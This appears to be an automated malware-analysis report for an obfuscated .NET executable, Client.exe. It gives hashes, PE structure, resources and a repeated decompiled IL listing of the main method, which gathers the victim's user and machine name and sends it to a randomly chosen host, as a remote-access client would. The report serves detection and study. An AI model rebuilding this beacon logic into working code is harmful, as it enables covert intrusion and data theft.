Suspicious
Suspect

e92574146a3df89600384ca210d9ee1a

PE Executable
|
MD5: e92574146a3df89600384ca210d9ee1a
|
Size: 785.92 KB
|
application/x-dosexec

Summary by MalvaGPT
Characteristics

Symbol Obfuscation Score

Very high

Hash
Hash Value
MD5
e92574146a3df89600384ca210d9ee1a
Sha1
b323b5309052da1dca8245a09696a13cce346abb
Sha256
0cad204b7b1977deedab017724f427459c001618f6566015ccde93a52dd8f470
Sha384
cbfb7dba22771f5ca1ddb90e9ac07edce98755e9c0fe64b6a882e919ff35ecd44f89617c56a9ffb54fb9e30af5eef465
Sha512
a1b6d456b3ae306cd2c904c2ba2fc76e40c73a6cc2ed0f9bd55068d027a25f6a021d03cb459a96f7822c498cb291063da83cd9b6e82fa9d179aa059be680338b
SSDeep
12288:lcLJxlxlu07dhkUrlptO/sP2en4TkbbOd+8yZpX5bvmKQd3nhRrBbnzPUV11y:qvluqXk+XULXT8bB5bvjQdX
TLSH
8CF46C157F98CD00D550293DC5BAB628CB2BA9F2290263437755B6E14E058DFEE3C2EB

PeID

.NET executable
Microsoft Visual C# / Basic .NET
Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL
Microsoft Visual C# v7.0 / Basic .NET
Microsoft Visual Studio .NET
File Structure
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_ICON
ID:0001
ID:0
RT_GROUP_CURSOR4
ID:0001
ID:0
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
rzpy0qi6zgghz492eprcqcl1ugy50
hj2htzibusyw55sq47k
Information
Name
Value
Info

PE Detect: PeReader OK (file layout)

Module Name

Client.exe

Full Name

Client.exe

EntryPoint

System.Void rubxNZhvnqopKtnfXDhZoNG.QEhYavSjaxdTeRwOlAGEIF::gdJqdBrQPYoFXllkn(System.String[])

Scope Name

Client.exe

Scope Type

ModuleDef

Kind

Windows

Runtime Version

v4.0.30319

Tables Header Version

512

WinMD Version

<null>

Assembly Name

Client

Assembly Version

1.0.0.0

Assembly Culture

<null>

Has PublicKey

False

PublicKey Token

<null>

Target Framework

.NETFramework,Version=v4.0

Total Strings

681

Main Method

System.Void rubxNZhvnqopKtnfXDhZoNG.QEhYavSjaxdTeRwOlAGEIF::gdJqdBrQPYoFXllkn(System.String[])

Main IL Instruction Count

167

Main IL

call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::tKbCtXFVTzRucxAhmaYoOcYg() stloc V_3 br IL_003F: br IL_000E nop <null> ldloc V_3 call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::yFlSPUawNtSU() ceq <null> brfalse IL_0029: nop nop <null> call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::nWzbYZHbaRMCyVW() stloc V_3 nop <null> ldloc V_3 call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::fQmvtvSTDEe() ceq <null> brfalse IL_003F: br IL_000E br IL_0044: call System.Void rubxNZhvnqopKtnfXDhZoNG.UqYNinokaemQkDjHhHhak::QzFWGJYDxnXUFCxWHbGed() br IL_000E: nop call System.Void rubxNZhvnqopKtnfXDhZoNG.UqYNinokaemQkDjHhHhak::QzFWGJYDxnXUFCxWHbGed() call System.Void rdqurKgVYxOLZWl.tTHSyyTOJbDOl::tVIbSKlHbQKqiYVuuxqH() ldsfld System.String rubxNZhvnqopKtnfXDhZoNG.UqYNinokaemQkDjHhHhak::DbrmrQtBwC call System.String rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::ScWjUkmCYHqtTWlul() call System.String gPqdaXEQIa.TGkvTVnfeludhSMDlAnqbzN::XJyPrmGfEZCKtGZg(System.String) call System.Boolean System.String::op_Equality(System.String,System.String) brfalse IL_006C: ldsfld System.String rubxNZhvnqopKtnfXDhZoNG.UqYNinokaemQkDjHhHhak::jHypDwlxfWltOIWjXufpNzScS call System.Void PLjPmXIKtRuSooqpbHyZ.IbGkzpMjVhoBxf::TGkcenhvaYjFQqIQOKxXzTbh() ldsfld System.String rubxNZhvnqopKtnfXDhZoNG.UqYNinokaemQkDjHhHhak::jHypDwlxfWltOIWjXufpNzScS call System.Boolean zkKQCFiwojTGkSXm.XKXLRSKaMnPEqR::PSrMBTnzMnHrJNuHmOax(System.String) brtrue IL_0080: call System.Void gPqdaXEQIa.mgpNBvXTMUtVyBGqoGAnceXhO::JpjURNyHDMAGNABXum() leave IL_0283: ret call System.Void gPqdaXEQIa.mgpNBvXTMUtVyBGqoGAnceXhO::JpjURNyHDMAGNABXum() call System.Void qScxWpkQgKuWKzPUx.EmXapzTxclALCPkYXJVok::zIzEeOeDXiJ() ldsfld rdqurKgVYxOLZWl.uixXfplrbRnLZ rubxNZhvnqopKtnfXDhZoNG.QEhYavSjaxdTeRwOlAGEIF::IHiGldmLpolAWWMx ldfld System.Boolean rdqurKgVYxOLZWl.uixXfplrbRnLZ::ymdylMYvuOD brtrue IL_026E: call System.Int32 
rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::nQZdCNvmGjZqLnER() ldsfld System.String rubxNZhvnqopKtnfXDhZoNG.UqYNinokaemQkDjHhHhak::oYiYOpbzwPn call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::xPEiNVmBpmEyYgXnYQQyDph() newarr System.Char dup <null> call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::gYXrEfYTuRdLNepdjV() call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::tMnXNYeumogmIhb() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_0 ldloc V_0 ldsfld System.Random qScxWpkQgKuWKzPUx.EmXapzTxclALCPkYXJVok::UOGBAKHudAUSFqHKIUS ldloc V_0 ldlen <null> conv.i4 <null> callvirt System.Int32 System.Random::Next(System.Int32) ldelem System.String call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::oyuwJNkDHC() newarr System.Char dup <null> call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::atbnPiYoQsBJT() call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::llfOeVdmcAfoYHfbkP() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_1 ldloc V_1 call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::MEALAQEjtKJno() ldelem System.String call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::WYcEodhioRaIbJRJoH() newarr System.Char dup <null> call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::zHWkafxZmkbTNqNCiCXvm() call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::dQjlspuRjWCBpTzoCZ() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_2 ldsfld rdqurKgVYxOLZWl.uixXfplrbRnLZ rubxNZhvnqopKtnfXDhZoNG.QEhYavSjaxdTeRwOlAGEIF::IHiGldmLpolAWWMx callvirt System.Void rdqurKgVYxOLZWl.uixXfplrbRnLZ::QuqQURSMuDYsxDntJQaOilre() ldsfld rdqurKgVYxOLZWl.uixXfplrbRnLZ rubxNZhvnqopKtnfXDhZoNG.QEhYavSjaxdTeRwOlAGEIF::IHiGldmLpolAWWMx ldloc V_1 call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::DuyMxNROHjGRMzWdGAomIeV() ldelem 
System.String ldloc V_2 ldsfld System.Random qScxWpkQgKuWKzPUx.EmXapzTxclALCPkYXJVok::UOGBAKHudAUSFqHKIUS ldloc V_2 ldlen <null> conv.i4 <null> callvirt System.Int32 System.Random::Next(System.Int32) ldelem System.String callvirt System.Void rdqurKgVYxOLZWl.uixXfplrbRnLZ::kpjGnlhKAqXeYpahbXrIVY(System.String,System.String) ldsfld rdqurKgVYxOLZWl.uixXfplrbRnLZ rubxNZhvnqopKtnfXDhZoNG.QEhYavSjaxdTeRwOlAGEIF::IHiGldmLpolAWWMx ldfld System.Boolean rdqurKgVYxOLZWl.uixXfplrbRnLZ::ymdylMYvuOD brfalse IL_026E: call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::nQZdCNvmGjZqLnER() ldsfld rdqurKgVYxOLZWl.uixXfplrbRnLZ rubxNZhvnqopKtnfXDhZoNG.QEhYavSjaxdTeRwOlAGEIF::IHiGldmLpolAWWMx ldsfld rdqurKgVYxOLZWl.uixXfplrbRnLZ rubxNZhvnqopKtnfXDhZoNG.QEhYavSjaxdTeRwOlAGEIF::IHiGldmLpolAWWMx newobj System.Void qScxWpkQgKuWKzPUx.QTXxSpAEEml::.ctor(rdqurKgVYxOLZWl.uixXfplrbRnLZ) stfld qScxWpkQgKuWKzPUx.QTXxSpAEEml rdqurKgVYxOLZWl.uixXfplrbRnLZ::ISCQqMyXHFcgqMJNOrYvjwfc ldsfld rdqurKgVYxOLZWl.uixXfplrbRnLZ rubxNZhvnqopKtnfXDhZoNG.QEhYavSjaxdTeRwOlAGEIF::IHiGldmLpolAWWMx ldsfld rdqurKgVYxOLZWl.uixXfplrbRnLZ rubxNZhvnqopKtnfXDhZoNG.QEhYavSjaxdTeRwOlAGEIF::IHiGldmLpolAWWMx newobj System.Void PLjPmXIKtRuSooqpbHyZ.UtOtAnafklAYIoj::.ctor(rdqurKgVYxOLZWl.uixXfplrbRnLZ) stfld PLjPmXIKtRuSooqpbHyZ.UtOtAnafklAYIoj rdqurKgVYxOLZWl.uixXfplrbRnLZ::jOCvOeTnLFSOeqUH ldsfld rdqurKgVYxOLZWl.uixXfplrbRnLZ rubxNZhvnqopKtnfXDhZoNG.QEhYavSjaxdTeRwOlAGEIF::IHiGldmLpolAWWMx call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::FRLBtCuAxE() newarr System.Object dup <null> call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::ifDlYabnidEpCSptnNmi() call System.String rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::fFrveFEvCwsV() call System.String gPqdaXEQIa.TGkvTVnfeludhSMDlAnqbzN::XJyPrmGfEZCKtGZg(System.String) stelem.ref <null> dup <null> call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::ZxHgBPUEoFTHRnxCP() call System.Byte[] 
qScxWpkQgKuWKzPUx.EmXapzTxclALCPkYXJVok::hcNiBfLGEJqWezYZ() stelem.ref <null> dup <null> call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::LhqmXAbJiDIHnKV() ldsfld System.String rubxNZhvnqopKtnfXDhZoNG.UqYNinokaemQkDjHhHhak::yeiZezXLGyVlmRJEOCA stelem.ref <null> dup <null> call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::IiwEWLGitXli() ldsfld System.String rubxNZhvnqopKtnfXDhZoNG.UqYNinokaemQkDjHhHhak::ZXMHOdrRSslrC stelem.ref <null> dup <null> call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::fsrXwbBimaGFrhQwhSIlI() call System.String System.Environment::get_UserName() call System.String rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::nUnOfMEvsQPuIac() call System.String gPqdaXEQIa.TGkvTVnfeludhSMDlAnqbzN::XJyPrmGfEZCKtGZg(System.String) call System.String System.Environment::get_MachineName() call System.String System.String::Concat(System.String,System.String,System.String) stelem.ref <null> dup <null> call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::PGKtAaHtzOsYDLRjqjU() ldsfld System.String rubxNZhvnqopKtnfXDhZoNG.UqYNinokaemQkDjHhHhak::tDqkZyXwJbhFwlQmOh stelem.ref <null> dup <null> call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::VIpzfdpmLFdwczclND() ldsfld System.String rubxNZhvnqopKtnfXDhZoNG.UqYNinokaemQkDjHhHhak::heroxkybrPZGUpcOAiLRERHNm stelem.ref <null> dup <null> call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::batasMTdFfybYRhJHQ() ldsfld System.String rubxNZhvnqopKtnfXDhZoNG.UqYNinokaemQkDjHhHhak::yAucAgWybwBOt stelem.ref <null> dup <null> call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::OWkVhtlwvEifV() ldsfld System.String rubxNZhvnqopKtnfXDhZoNG.UqYNinokaemQkDjHhHhak::jVNgMlpLpglacRxhfXNxeGD stelem.ref <null> dup <null> call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::JtzchxmMAkHNeEevqVUCp() ldsfld System.String rubxNZhvnqopKtnfXDhZoNG.UqYNinokaemQkDjHhHhak::bXfgkVNQUX stelem.ref <null> dup <null> call 
System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::qFLhGQXZWzc() ldsfld System.String rubxNZhvnqopKtnfXDhZoNG.UqYNinokaemQkDjHhHhak::JPGouolXtefUiLZXNxI stelem.ref <null> dup <null> call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::OYihZTYBWANUPgRANNKSxG() ldsfld System.String rubxNZhvnqopKtnfXDhZoNG.UqYNinokaemQkDjHhHhak::KeOraOdwBkoESIBRNdSBGo stelem.ref <null> dup <null> call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::uRAqVobOHk() ldsfld System.String rubxNZhvnqopKtnfXDhZoNG.UqYNinokaemQkDjHhHhak::hwLpUIkfGfrNiinfo stelem.ref <null> dup <null> call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::pGNJvBenhprrRazXLIoJqI() call System.String qScxWpkQgKuWKzPUx.EmXapzTxclALCPkYXJVok::OQgNUaHyoPWWDYajInRzP() stelem.ref <null> call System.Byte[] IaITmVGGNmjUnt.QwggAGOYROpBwssqhZQJEYLk::pXmTUNMEssrkwBKiaNHbn(System.Object[]) callvirt System.Void rdqurKgVYxOLZWl.uixXfplrbRnLZ::hRSEToyMkdxpebzQKj(System.Byte[]) call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::nQZdCNvmGjZqLnER() call System.Void System.Threading.Thread::Sleep(System.Int32) br IL_008A: ldsfld rdqurKgVYxOLZWl.uixXfplrbRnLZ rubxNZhvnqopKtnfXDhZoNG.QEhYavSjaxdTeRwOlAGEIF::IHiGldmLpolAWWMx pop <null> leave IL_0283: ret ret <null>

Module Name

Client.exe

Full Name

Client.exe

EntryPoint

System.Void rubxNZhvnqopKtnfXDhZoNG.QEhYavSjaxdTeRwOlAGEIF::gdJqdBrQPYoFXllkn(System.String[])

Scope Name

Client.exe

Scope Type

ModuleDef

Kind

Windows

Runtime Version

v4.0.30319

Tables Header Version

512

WinMD Version

<null>

Assembly Name

Client

Assembly Version

1.0.0.0

Assembly Culture

<null>

Has PublicKey

False

PublicKey Token

<null>

Target Framework

.NETFramework,Version=v4.0

Total Strings

681

Main Method

System.Void rubxNZhvnqopKtnfXDhZoNG.QEhYavSjaxdTeRwOlAGEIF::gdJqdBrQPYoFXllkn(System.String[])

Main IL Instruction Count

167

Main IL

call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::tKbCtXFVTzRucxAhmaYoOcYg() stloc V_3 br IL_003F: br IL_000E nop <null> ldloc V_3 call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::yFlSPUawNtSU() ceq <null> brfalse IL_0029: nop nop <null> call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::nWzbYZHbaRMCyVW() stloc V_3 nop <null> ldloc V_3 call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::fQmvtvSTDEe() ceq <null> brfalse IL_003F: br IL_000E br IL_0044: call System.Void rubxNZhvnqopKtnfXDhZoNG.UqYNinokaemQkDjHhHhak::QzFWGJYDxnXUFCxWHbGed() br IL_000E: nop call System.Void rubxNZhvnqopKtnfXDhZoNG.UqYNinokaemQkDjHhHhak::QzFWGJYDxnXUFCxWHbGed() call System.Void rdqurKgVYxOLZWl.tTHSyyTOJbDOl::tVIbSKlHbQKqiYVuuxqH() ldsfld System.String rubxNZhvnqopKtnfXDhZoNG.UqYNinokaemQkDjHhHhak::DbrmrQtBwC call System.String rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::ScWjUkmCYHqtTWlul() call System.String gPqdaXEQIa.TGkvTVnfeludhSMDlAnqbzN::XJyPrmGfEZCKtGZg(System.String) call System.Boolean System.String::op_Equality(System.String,System.String) brfalse IL_006C: ldsfld System.String rubxNZhvnqopKtnfXDhZoNG.UqYNinokaemQkDjHhHhak::jHypDwlxfWltOIWjXufpNzScS call System.Void PLjPmXIKtRuSooqpbHyZ.IbGkzpMjVhoBxf::TGkcenhvaYjFQqIQOKxXzTbh() ldsfld System.String rubxNZhvnqopKtnfXDhZoNG.UqYNinokaemQkDjHhHhak::jHypDwlxfWltOIWjXufpNzScS call System.Boolean zkKQCFiwojTGkSXm.XKXLRSKaMnPEqR::PSrMBTnzMnHrJNuHmOax(System.String) brtrue IL_0080: call System.Void gPqdaXEQIa.mgpNBvXTMUtVyBGqoGAnceXhO::JpjURNyHDMAGNABXum() leave IL_0283: ret call System.Void gPqdaXEQIa.mgpNBvXTMUtVyBGqoGAnceXhO::JpjURNyHDMAGNABXum() call System.Void qScxWpkQgKuWKzPUx.EmXapzTxclALCPkYXJVok::zIzEeOeDXiJ() ldsfld rdqurKgVYxOLZWl.uixXfplrbRnLZ rubxNZhvnqopKtnfXDhZoNG.QEhYavSjaxdTeRwOlAGEIF::IHiGldmLpolAWWMx ldfld System.Boolean rdqurKgVYxOLZWl.uixXfplrbRnLZ::ymdylMYvuOD brtrue IL_026E: call System.Int32 
rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::nQZdCNvmGjZqLnER() ldsfld System.String rubxNZhvnqopKtnfXDhZoNG.UqYNinokaemQkDjHhHhak::oYiYOpbzwPn call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::xPEiNVmBpmEyYgXnYQQyDph() newarr System.Char dup <null> call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::gYXrEfYTuRdLNepdjV() call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::tMnXNYeumogmIhb() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_0 ldloc V_0 ldsfld System.Random qScxWpkQgKuWKzPUx.EmXapzTxclALCPkYXJVok::UOGBAKHudAUSFqHKIUS ldloc V_0 ldlen <null> conv.i4 <null> callvirt System.Int32 System.Random::Next(System.Int32) ldelem System.String call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::oyuwJNkDHC() newarr System.Char dup <null> call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::atbnPiYoQsBJT() call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::llfOeVdmcAfoYHfbkP() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_1 ldloc V_1 call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::MEALAQEjtKJno() ldelem System.String call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::WYcEodhioRaIbJRJoH() newarr System.Char dup <null> call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::zHWkafxZmkbTNqNCiCXvm() call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::dQjlspuRjWCBpTzoCZ() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_2 ldsfld rdqurKgVYxOLZWl.uixXfplrbRnLZ rubxNZhvnqopKtnfXDhZoNG.QEhYavSjaxdTeRwOlAGEIF::IHiGldmLpolAWWMx callvirt System.Void rdqurKgVYxOLZWl.uixXfplrbRnLZ::QuqQURSMuDYsxDntJQaOilre() ldsfld rdqurKgVYxOLZWl.uixXfplrbRnLZ rubxNZhvnqopKtnfXDhZoNG.QEhYavSjaxdTeRwOlAGEIF::IHiGldmLpolAWWMx ldloc V_1 call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::DuyMxNROHjGRMzWdGAomIeV() ldelem 
System.String ldloc V_2 ldsfld System.Random qScxWpkQgKuWKzPUx.EmXapzTxclALCPkYXJVok::UOGBAKHudAUSFqHKIUS ldloc V_2 ldlen <null> conv.i4 <null> callvirt System.Int32 System.Random::Next(System.Int32) ldelem System.String callvirt System.Void rdqurKgVYxOLZWl.uixXfplrbRnLZ::kpjGnlhKAqXeYpahbXrIVY(System.String,System.String) ldsfld rdqurKgVYxOLZWl.uixXfplrbRnLZ rubxNZhvnqopKtnfXDhZoNG.QEhYavSjaxdTeRwOlAGEIF::IHiGldmLpolAWWMx ldfld System.Boolean rdqurKgVYxOLZWl.uixXfplrbRnLZ::ymdylMYvuOD brfalse IL_026E: call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::nQZdCNvmGjZqLnER() ldsfld rdqurKgVYxOLZWl.uixXfplrbRnLZ rubxNZhvnqopKtnfXDhZoNG.QEhYavSjaxdTeRwOlAGEIF::IHiGldmLpolAWWMx ldsfld rdqurKgVYxOLZWl.uixXfplrbRnLZ rubxNZhvnqopKtnfXDhZoNG.QEhYavSjaxdTeRwOlAGEIF::IHiGldmLpolAWWMx newobj System.Void qScxWpkQgKuWKzPUx.QTXxSpAEEml::.ctor(rdqurKgVYxOLZWl.uixXfplrbRnLZ) stfld qScxWpkQgKuWKzPUx.QTXxSpAEEml rdqurKgVYxOLZWl.uixXfplrbRnLZ::ISCQqMyXHFcgqMJNOrYvjwfc ldsfld rdqurKgVYxOLZWl.uixXfplrbRnLZ rubxNZhvnqopKtnfXDhZoNG.QEhYavSjaxdTeRwOlAGEIF::IHiGldmLpolAWWMx ldsfld rdqurKgVYxOLZWl.uixXfplrbRnLZ rubxNZhvnqopKtnfXDhZoNG.QEhYavSjaxdTeRwOlAGEIF::IHiGldmLpolAWWMx newobj System.Void PLjPmXIKtRuSooqpbHyZ.UtOtAnafklAYIoj::.ctor(rdqurKgVYxOLZWl.uixXfplrbRnLZ) stfld PLjPmXIKtRuSooqpbHyZ.UtOtAnafklAYIoj rdqurKgVYxOLZWl.uixXfplrbRnLZ::jOCvOeTnLFSOeqUH ldsfld rdqurKgVYxOLZWl.uixXfplrbRnLZ rubxNZhvnqopKtnfXDhZoNG.QEhYavSjaxdTeRwOlAGEIF::IHiGldmLpolAWWMx call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::FRLBtCuAxE() newarr System.Object dup <null> call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::ifDlYabnidEpCSptnNmi() call System.String rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::fFrveFEvCwsV() call System.String gPqdaXEQIa.TGkvTVnfeludhSMDlAnqbzN::XJyPrmGfEZCKtGZg(System.String) stelem.ref <null> dup <null> call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::ZxHgBPUEoFTHRnxCP() call System.Byte[] 
qScxWpkQgKuWKzPUx.EmXapzTxclALCPkYXJVok::hcNiBfLGEJqWezYZ() stelem.ref <null> dup <null> call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::LhqmXAbJiDIHnKV() ldsfld System.String rubxNZhvnqopKtnfXDhZoNG.UqYNinokaemQkDjHhHhak::yeiZezXLGyVlmRJEOCA stelem.ref <null> dup <null> call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::IiwEWLGitXli() ldsfld System.String rubxNZhvnqopKtnfXDhZoNG.UqYNinokaemQkDjHhHhak::ZXMHOdrRSslrC stelem.ref <null> dup <null> call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::fsrXwbBimaGFrhQwhSIlI() call System.String System.Environment::get_UserName() call System.String rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::nUnOfMEvsQPuIac() call System.String gPqdaXEQIa.TGkvTVnfeludhSMDlAnqbzN::XJyPrmGfEZCKtGZg(System.String) call System.String System.Environment::get_MachineName() call System.String System.String::Concat(System.String,System.String,System.String) stelem.ref <null> dup <null> call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::PGKtAaHtzOsYDLRjqjU() ldsfld System.String rubxNZhvnqopKtnfXDhZoNG.UqYNinokaemQkDjHhHhak::tDqkZyXwJbhFwlQmOh stelem.ref <null> dup <null> call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::VIpzfdpmLFdwczclND() ldsfld System.String rubxNZhvnqopKtnfXDhZoNG.UqYNinokaemQkDjHhHhak::heroxkybrPZGUpcOAiLRERHNm stelem.ref <null> dup <null> call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::batasMTdFfybYRhJHQ() ldsfld System.String rubxNZhvnqopKtnfXDhZoNG.UqYNinokaemQkDjHhHhak::yAucAgWybwBOt stelem.ref <null> dup <null> call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::OWkVhtlwvEifV() ldsfld System.String rubxNZhvnqopKtnfXDhZoNG.UqYNinokaemQkDjHhHhak::jVNgMlpLpglacRxhfXNxeGD stelem.ref <null> dup <null> call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::JtzchxmMAkHNeEevqVUCp() ldsfld System.String rubxNZhvnqopKtnfXDhZoNG.UqYNinokaemQkDjHhHhak::bXfgkVNQUX stelem.ref <null> dup <null> call 
System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::qFLhGQXZWzc() ldsfld System.String rubxNZhvnqopKtnfXDhZoNG.UqYNinokaemQkDjHhHhak::JPGouolXtefUiLZXNxI stelem.ref <null> dup <null> call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::OYihZTYBWANUPgRANNKSxG() ldsfld System.String rubxNZhvnqopKtnfXDhZoNG.UqYNinokaemQkDjHhHhak::KeOraOdwBkoESIBRNdSBGo stelem.ref <null> dup <null> call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::uRAqVobOHk() ldsfld System.String rubxNZhvnqopKtnfXDhZoNG.UqYNinokaemQkDjHhHhak::hwLpUIkfGfrNiinfo stelem.ref <null> dup <null> call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::pGNJvBenhprrRazXLIoJqI() call System.String qScxWpkQgKuWKzPUx.EmXapzTxclALCPkYXJVok::OQgNUaHyoPWWDYajInRzP() stelem.ref <null> call System.Byte[] IaITmVGGNmjUnt.QwggAGOYROpBwssqhZQJEYLk::pXmTUNMEssrkwBKiaNHbn(System.Object[]) callvirt System.Void rdqurKgVYxOLZWl.uixXfplrbRnLZ::hRSEToyMkdxpebzQKj(System.Byte[]) call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::nQZdCNvmGjZqLnER() call System.Void System.Threading.Thread::Sleep(System.Int32) br IL_008A: ldsfld rdqurKgVYxOLZWl.uixXfplrbRnLZ rubxNZhvnqopKtnfXDhZoNG.QEhYavSjaxdTeRwOlAGEIF::IHiGldmLpolAWWMx pop <null> leave IL_0283: ret ret <null>

e92574146a3df89600384ca210d9ee1a (785.92 KB)
File Structure
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_ICON
ID:0001
ID:0
RT_GROUP_CURSOR4
ID:0001
